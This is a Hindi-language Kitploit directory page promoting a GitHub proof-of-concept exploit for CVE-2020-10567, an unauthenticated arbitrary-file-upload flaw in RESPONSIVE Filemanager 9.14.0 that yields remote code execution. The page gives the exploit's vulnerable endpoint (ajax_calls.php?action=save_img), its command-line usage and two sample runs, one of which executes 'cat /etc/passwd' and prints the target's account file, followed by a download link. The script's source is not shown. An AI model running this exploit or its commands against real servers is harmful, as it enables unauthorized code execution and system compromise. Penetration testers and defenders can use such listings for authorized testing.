Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-10567 — RCE RESPONSIVE filemanager v.9.14.0 | Kitploit
उपकरण/GitHubGitHub/pierreadams/cve-2020-10567
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubpierreadams/cve-2020-10567

CVE-2020-10567

RCE RESPONSIVE filemanager v.9.14.0

रिपॉजिटरी देखें
42 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

POC-CVE-2020-10567

RCE poc - RESPONSIVE filemanager v.9.14.0. मुख्य शाखा नहीं ⚠️

गिटहब प्रोजेक्ट : https://github.com/trippo/ResponsiveFilemanager

आवश्यकताएँ: कुछ भी आवश्यक नहीं है, यह शोषण अप्रमाणित है।

RESPONSIVE Filemanager एप्लिकेशन एक वेब-आधारित फ़ाइल प्रबंधन उपकरण है जिसका उपयोग सर्वर पर फ़ाइलों को संभालने के लिए किया जाता है। यह कमजोरी (CVE-2020-10567) एक हमलावर को ajax_calls.php?action=save_img के माध्यम से अनुचित इनपुट सत्यापन का शोषण करके मनमानी फ़ाइल अपलोड करने की अनुमति देती है, जिससे लक्ष्य प्रणाली पर रिमोट कोड निष्पादन होता है।

यह शोषण Packet Storm पर उपलब्ध एक सार्वजनिक प्रूफ-ऑफ-कॉन्सेप्ट से प्रेरित है। (https://packetstorm.news/files/id/171280)

उपयोग :

root@kitploit:~
$ python3 POC_CVE-2020-10567.py -h
usage: POC_CVE-2020-10567.py [-h] [-C COOKIE] -c COMMAND -u URL

Exploit RESPONSIVE filemanager v.9.14.0 (not Main branche!!)

options:
  -h, --help            show this help message and exit
  -C COOKIE, --cookie COOKIE
                        Cookie
  -c COMMAND, --command COMMAND
                        Command to execute
  -u URL, --url URL     RESPONSIVE filemanager url
root@kitploit:~
$ python3 POC_CVE-2020-10567.py -c 'id' -u http://127.0.0.1:8080
[>] Cookie collecting ... 
[>] Cookie collect : PHPSESSID=XXXXXXXXXXX
[>] Requets POST Send
[>] payload send
[>] Response:

uid=1000(application) gid=1000(application) groups=1000(application)

आप कुकी निर्दिष्ट कर सकते हैं :

root@kitploit:~
$ python3 POC_CVE-2020-10567.py -c 'cat /etc/passwd' -u http://127.0.0.1:8080 -C Cookie_Test
[>] Cookie : Cookie_Test
[>] Cookie collect : PHPSESSID=Cookie_Test
[>] Requets POST Send
[>] Payload send
[>] Response:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
application:x:1000:1000::/home/application:/bin/bash
blackfire:x:999:999::/dev/null:/bin/sh
postfix:x:101:104::/var/spool/postfix:/usr/sbin/nologin
टूल डाउनलोड करें